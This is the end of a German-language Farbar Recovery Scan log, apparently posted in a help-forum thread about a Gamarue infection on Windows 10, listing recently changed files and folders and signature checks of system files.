2017-07-04 22:54 - 2016-10-25 19:04 - 00000000 ____D C:\Users\ararat\Documents\Tickets
2017-07-04 21:38 - 2017-03-20 06:41 - 01067190 _____ C:\WINDOWS\system32\perfh007.dat
2017-07-04 21:38 - 2017-03-20 06:41 - 00247464 _____ C:\WINDOWS\system32\perfc007.dat
2017-07-04 21:38 - 2016-11-19 13:21 - 00136439 _____ C:\WINDOWS\system32\InstallUtil.InstallLog
2017-07-04 21:34 - 2017-03-18 23:03 - 00000000 ___HD C:\Program Files\WindowsApps
2017-07-04 21:34 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\AppReadiness
2017-07-03 21:28 - 2016-03-27 18:17 - 00000000 ____D C:\Program Files\Common Files\Adobe
2017-07-03 21:28 - 2016-03-27 18:17 - 00000000 ____D C:\Program Files\Adobe
2017-07-03 21:28 - 2016-02-23 23:18 - 00000000 ____D C:\Program Files (x86)\Adobe
2017-07-03 21:28 - 2016-02-23 23:10 - 00000000 ____D C:\ProgramData\Adobe
2017-06-27 22:23 - 2016-02-23 22:19 - 00000000 ____D C:\Program Files (x86)\Dropbox
2017-06-27 21:00 - 2016-02-23 23:03 - 00000321 _____ C:\Users\ararat\Documents\BIMx_Export_Log.txt
2017-06-27 21:00 - 2016-02-23 23:03 - 00000000 ____D C:\Users\ararat\Graphisoft
2017-06-27 20:26 - 2016-02-23 23:03 - 00000000 ____D C:\Users\ararat\Documents\BIMx
2017-06-26 22:07 - 2016-02-20 13:26 - 00000000 ____D C:\Users\ararat\AppData\Roaming\Spotify
2017-06-26 22:07 - 2016-02-20 13:26 - 00000000 ____D C:\Users\ararat\AppData\Local\Spotify
2017-06-22 09:12 - 2016-02-23 22:22 - 00000000 ___RD C:\Users\ararat\Dropbox
2017-06-21 22:52 - 2017-03-18 23:01 - 00000000 ____D C:\WINDOWS\INF
2017-06-19 22:57 - 2016-02-23 22:19 - 00000000 ____D C:\Users\ararat\AppData\Local\Dropbox
2017-06-19 21:59 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\rescache
2017-06-15 19:05 - 2016-02-12 20:16 - 00000000 __RHD C:\Users\Public\AccountPictures
2017-06-14 22:12 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\LiveKernelReports
2017-06-14 22:11 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\oobe
2017-06-14 22:11 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\appraiser
2017-06-14 20:33 - 2016-02-11 21:55 - 00000000 ____D C:\WINDOWS\system32\MRT
2017-06-14 20:32 - 2017-03-18 22:51 - 00000000 ____D C:\WINDOWS\CbsTemp
2017-06-14 20:32 - 2016-02-11 21:55 - 133627792 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2017-06-14 20:22 - 2016-02-12 20:18 - 00002435 _____ C:\Users\ararat\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
2017-06-14 20:22 - 2016-02-12 20:18 - 00000000 ___RD C:\Users\ararat\OneDrive
2017-06-13 08:54 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\appcompat
2017-06-13 08:53 - 2016-02-12 20:16 - 00000000 ____D C:\Users\ararat\AppData\Local\Packages
2017-06-12 21:57 - 2016-09-17 15:35 - 00000000 ____D C:\Users\ararat\AppData\Roaming\Skype
2017-06-12 21:54 - 2017-03-18 23:03 - 00000000 ___RD C:\WINDOWS\ImmersiveControlPanel
2017-06-08 09:58 - 2017-03-18 23:03 - 00028672 _____ C:\WINDOWS\system32\config\BCD-Template
2017-06-08 09:54 - 2017-03-18 23:06 - 00000000 ____D C:\WINDOWS\Setup
2017-06-08 09:54 - 2017-03-18 23:03 - 00000000 ___SD C:\WINDOWS\SysWOW64\F12
2017-06-08 09:54 - 2017-03-18 23:03 - 00000000 ___SD C:\WINDOWS\system32\F12
2017-06-08 09:54 - 2017-03-18 23:03 - 00000000 ___RD C:\Program Files\Windows Defender
2017-06-08 09:54 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\SysWOW64\Dism
2017-06-08 09:54 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\ShellExperiences
2017-06-08 09:54 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\Provisioning
2017-06-08 09:54 - 2017-03-18 23:03 - 00000000 ____D C:\Program Files\Windows Photo Viewer
2017-06-08 09:54 - 2017-03-18 23:03 - 00000000 ____D C:\Program Files (x86)\Windows Photo Viewer
2017-06-08 09:54 - 2017-03-18 13:40 - 00000000 ____D C:\WINDOWS\system32\Dism
2017-06-08 09:48 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\SysWOW64\MUI
2017-06-08 09:48 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\MUI
2017-06-08 09:48 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\inetsrv
2017-06-08 09:48 - 2017-03-18 22:59 - 00611840 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mqsnap.dll
2017-06-08 09:48 - 2017-03-18 22:59 - 00562176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mqutil.dll
2017-06-08 09:48 - 2017-03-18 22:59 - 00261120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mqoa.dll
2017-06-08 09:48 - 2017-03-18 22:59 - 00204800 _____ (Microsoft Corporation) C:\WINDOWS\system32\iisRtl.dll
2017-06-08 09:48 - 2017-03-18 22:59 - 00172544 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iisRtl.dll
2017-06-08 09:48 - 2017-03-18 22:59 - 00156160 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mqrt.dll
2017-06-08 09:48 - 2017-03-18 22:59 - 00096256 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mqoa.tlb
2017-06-08 09:48 - 2017-03-18 22:59 - 00090624 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mqoa30.tlb
2017-06-08 09:48 - 2017-03-18 22:59 - 00055296 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mqoa20.tlb
2017-06-08 09:48 - 2017-03-18 22:59 - 00054272 _____ (Microsoft Corporation) C:\WINDOWS\system32\admwprox.dll
2017-06-08 09:48 - 2017-03-18 22:59 - 00053248 _____ (Microsoft Corporation) C:\WINDOWS\system32\ahadmin.dll
2017-06-08 09:48 - 2017-03-18 22:59 - 00049664 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\admwprox.dll
2017-06-08 09:48 - 2017-03-18 22:59 - 00036864 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mqoa10.tlb
2017-06-08 09:48 - 2017-03-18 22:59 - 00026112 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ahadmin.dll
2017-06-08 09:48 - 2017-03-18 22:59 - 00019456 _____ (Microsoft Corporation) C:\WINDOWS\system32\iisreset.exe
2017-06-08 09:48 - 2017-03-18 22:59 - 00016896 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iisreset.exe
2017-06-08 09:48 - 2017-03-18 22:59 - 00015360 _____ (Microsoft Corporation) C:\WINDOWS\system32\wamregps.dll
2017-06-08 09:48 - 2017-03-18 22:59 - 00014848 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mqcertui.dll
2017-06-08 09:48 - 2017-03-18 22:59 - 00014336 _____ (Microsoft Corporation) C:\WINDOWS\system32\cngkeyhelper.dll
2017-06-08 09:48 - 2017-03-18 22:59 - 00013312 _____ (Microsoft Corporation) C:\WINDOWS\system32\iisrstap.dll
2017-06-08 09:48 - 2017-03-18 22:59 - 00011264 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wamregps.dll
2017-06-08 09:48 - 2017-03-18 22:59 - 00011264 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\cngkeyhelper.dll
2017-06-08 09:48 - 2017-03-18 22:59 - 00010240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iisrstap.dll
2017-06-08 09:48 - 2017-03-18 22:59 - 00009096 _____ C:\WINDOWS\SysWOW64\msmqtrc.mof
2017-06-08 09:48 - 2017-03-18 22:56 - 01380352 _____ (Microsoft Corporation) C:\WINDOWS\system32\mqqm.dll
2017-06-08 09:48 - 2017-03-18 22:56 - 00774144 _____ (Microsoft Corporation) C:\WINDOWS\system32\mqsnap.dll
2017-06-08 09:48 - 2017-03-18 22:56 - 00564224 _____ (Microsoft Corporation) C:\WINDOWS\system32\mqutil.dll
2017-06-08 09:48 - 2017-03-18 22:56 - 00305664 _____ (Microsoft Corporation) C:\WINDOWS\system32\mqoa.dll
2017-06-08 09:48 - 2017-03-18 22:56 - 00222720 _____ (Microsoft Corporation) C:\WINDOWS\system32\mqrt.dll
2017-06-08 09:48 - 2017-03-18 22:56 - 00177664 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mqac.sys
2017-06-08 09:48 - 2017-03-18 22:56 - 00125440 _____ (Microsoft Corporation) C:\WINDOWS\system32\mqlogmgr.dll
2017-06-08 09:48 - 2017-03-18 22:56 - 00096256 _____ (Microsoft Corporation) C:\WINDOWS\system32\mqoa.tlb
2017-06-08 09:48 - 2017-03-18 22:56 - 00090624 _____ (Microsoft Corporation) C:\WINDOWS\system32\mqoa30.tlb
2017-06-08 09:48 - 2017-03-18 22:56 - 00055296 _____ (Microsoft Corporation) C:\WINDOWS\system32\mqoa20.tlb
2017-06-08 09:48 - 2017-03-18 22:56 - 00051712 _____ (Microsoft Corporation) C:\WINDOWS\system32\mqbkup.exe
2017-06-08 09:48 - 2017-03-18 22:56 - 00036864 _____ (Microsoft Corporation) C:\WINDOWS\system32\mqoa10.tlb
2017-06-08 09:48 - 2017-03-18 22:56 - 00026112 _____ (Microsoft Corporation) C:\WINDOWS\system32\mqsvc.exe
2017-06-08 09:48 - 2017-03-18 22:56 - 00018432 _____ (Microsoft Corporation) C:\WINDOWS\system32\mqcertui.dll
2017-06-08 09:48 - 2017-03-18 22:56 - 00009096 _____ C:\WINDOWS\system32\msmqtrc.mof
2017-06-08 09:17 - 2017-03-18 23:03 - 00000000 ____D C:\ProgramData\USOPrivate
2017-06-08 09:13 - 2016-09-24 14:37 - 00000000 ____D C:\Program Files (x86)\SunplusIT Integrated Camera
2017-06-08 09:11 - 2017-03-18 23:03 - 00000000 ____D C:\Program Files\Windows NT
2017-06-08 09:10 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\WinBioDatabase
2017-06-08 09:10 - 2017-03-18 13:40 - 00032768 _____ C:\WINDOWS\system32\config\ELAM
2017-06-08 09:09 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\Registration
2017-06-08 09:09 - 2017-03-18 23:03 - 00000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2017-06-08 09:09 - 2016-07-16 13:47 - 00000000 ____D C:\WINDOWS\system32\Tasks_Migrated
2017-06-08 09:08 - 2017-03-20 06:43 - 00000000 ____D C:\WINDOWS\HoloShell
2017-06-08 09:08 - 2017-03-18 23:03 - 00000000 __RSD C:\WINDOWS\Media
2017-06-08 09:08 - 2017-03-18 23:03 - 00000000 __RHD C:\Users\Public\Libraries
2017-06-08 09:08 - 2016-02-12 19:33 - 00023056 _____ C:\WINDOWS\system32\emptyregdb.dat
2017-06-08 09:06 - 2017-05-18 08:30 - 00000000 ____D C:\WINDOWS\system32\UNP
2017-06-08 09:06 - 2017-05-01 17:51 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Rhinoceros 5
2017-06-08 09:06 - 2016-07-14 22:45 - 00000000 ___SD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\OpenOffice 4.1.2
2017-06-08 09:06 - 2016-07-09 22:40 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Silverlight
2017-06-08 09:06 - 2016-04-21 18:36 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Autodesk 3ds Max 2015
2017-06-08 09:06 - 2016-04-21 18:33 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Autodesk
2017-06-08 09:06 - 2016-03-23 19:09 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ScummVM
2017-06-08 09:06 - 2016-02-23 22:54 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WibuKey
2017-06-08 09:06 - 2016-02-23 22:54 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CodeMeter
2017-06-08 09:06 - 2016-02-23 22:46 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\GRAPHISOFT
2017-06-08 09:06 - 2016-02-23 22:45 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java
2017-06-08 09:06 - 2016-02-21 19:51 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\TeamSpeak 3 Client
2017-06-08 09:06 - 2016-02-21 13:51 - 00000000 ____D C:\Users\ararat\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WinRAR
2017-06-08 09:06 - 2016-02-21 13:51 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinRAR
2017-06-08 09:06 - 2016-02-13 16:12 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\SRWare Iron (64-Bit)
2017-06-08 09:06 - 2016-02-12 20:22 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Dolby
2017-06-08 09:06 - 2016-02-11 22:02 - 00000000 ____D C:\WINDOWS\SysWOW64\NV
2017-06-08 09:06 - 2016-02-11 22:02 - 00000000 ____D C:\WINDOWS\system32\NV
2017-06-08 09:05 - 2015-10-30 08:28 - 00000000 ____D C:\Users\Default.migrated
2017-06-08 09:02 - 2017-05-28 09:52 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Skype
2017-06-08 09:02 - 2017-03-20 06:42 - 00000000 ____D C:\WINDOWS\OCR
2017-06-08 09:02 - 2017-03-20 06:41 - 00000000 ____D C:\WINDOWS\SysWOW64\sysprep
2017-06-08 09:02 - 2017-03-18 23:03 - 00000000 __SHD C:\Program Files (x86)\Windows Sidebar
2017-06-08 09:02 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\SysWOW64\IME
2017-06-08 09:02 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\spool
2017-06-08 09:02 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\NDF
2017-06-08 09:02 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\IME
2017-06-08 09:02 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\schemas
2017-06-08 09:02 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\PolicyDefinitions
2017-06-08 09:02 - 2017-03-13 19:32 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Itoo Software
2017-06-08 09:02 - 2016-11-15 23:08 - 00000000 ___HD C:\WINDOWS\system32\WLANProfiles
2017-06-08 09:02 - 2016-10-22 10:06 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Lexicon
2017-06-08 09:02 - 2016-10-22 09:40 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\IK Multimedia
2017-06-08 09:02 - 2016-07-15 17:42 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Lenovo
2017-06-08 09:02 - 2016-05-07 11:39 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Intel
2017-06-08 09:02 - 2016-04-21 21:04 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Chaos Group
2017-06-08 09:02 - 2016-04-21 18:38 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Autodesk Backburner 2015
2017-06-08 09:02 - 2016-02-12 20:24 - 00000000 ____D C:\WINDOWS\SysWOW64\sda
2017-06-08 09:02 - 2016-02-11 22:02 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\NVIDIA Corporation
2017-06-08 09:01 - 2017-03-18 23:03 - 00000000 __SHD C:\Program Files\Windows Sidebar
2017-06-08 09:01 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\SysWOW64\inetsrv
2017-06-08 09:01 - 2017-03-18 23:03 - 00000000 ____D C:\Program Files\Common Files\microsoft shared
2017-06-08 09:01 - 2017-03-13 19:32 - 00000000 ____D C:\Users\ararat\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Itoo Software
2017-06-08 09:00 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\WinBioPlugIns
2017-06-08 09:00 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\Help
2017-06-08 09:00 - 2017-03-18 13:40 - 00000000 ____D C:\WINDOWS\system32\Sysprep
2017-06-08 08:59 - 2016-02-11 20:23 - 00000000 ____D C:\Intel
==================== Dateien im Wurzelverzeichnis einiger Verzeichnisse =======
2016-08-02 21:46 - 2017-04-03 21:08 - 0000132 _____ () C:\Users\ararat\AppData\Roaming\Adobe PNG Format CS6 Prefs
2016-11-04 00:45 - 2017-03-10 23:52 - 0001456 _____ () C:\Users\ararat\AppData\Local\Adobe Save for Web 13.0 Prefs
2017-07-05 21:30 - 2017-07-05 21:30 - 0000000 ____H () C:\ProgramData\cm-lock
2017-06-08 08:59 - 2017-06-08 08:59 - 0000000 ____H () C:\ProgramData\DP45977C.lfl
==================== Bamital & volsnap ======================
(Es ist kein automatischer Fix für Dateien vorhanden, die an der Verifikation gescheitert sind.)
C:\WINDOWS\system32\winlogon.exe => Datei ist digital signiert
C:\WINDOWS\system32\wininit.exe => Datei ist digital signiert
C:\WINDOWS\explorer.exe => Datei ist digital signiert
C:\WINDOWS\SysWOW64\explorer.exe => Datei ist digital signiert
C:\WINDOWS\system32\svchost.exe => Datei ist digital signiert
C:\WINDOWS\SysWOW64\svchost.exe => Datei ist digital signiert
C:\WINDOWS\system32\services.exe => Datei ist digital signiert
C:\WINDOWS\system32\User32.dll => Datei ist digital signiert
C:\WINDOWS\SysWOW64\User32.dll => Datei ist digital signiert
C:\WINDOWS\system32\userinit.exe => Datei ist digital signiert
C:\WINDOWS\SysWOW64\userinit.exe => Datei ist digital signiert
C:\WINDOWS\system32\rpcss.dll => Datei ist digital signiert
C:\WINDOWS\system32\dnsapi.dll => Datei ist digital signiert
C:\WINDOWS\SysWOW64\dnsapi.dll => Datei ist digital signiert
C:\WINDOWS\system32\Drivers\volsnap.sys => Datei ist digital signiert
LastRegBack: 2017-07-03 01:25
==================== Ende von FRST.txt ============================
|
|
| Themen zu Windows 10 - Gamarue |
| defender, erhalte, erhalten, farbars recovery, forum, gamarue, gefunde, gefundene, gefundenen, hartnäckig, hilfe, informationen, recht, recovery, scan, schonmal, schritte, tagen, tolle, tool, virus, windows, windows 10, windows defender, würde |
Linear-Darstellung
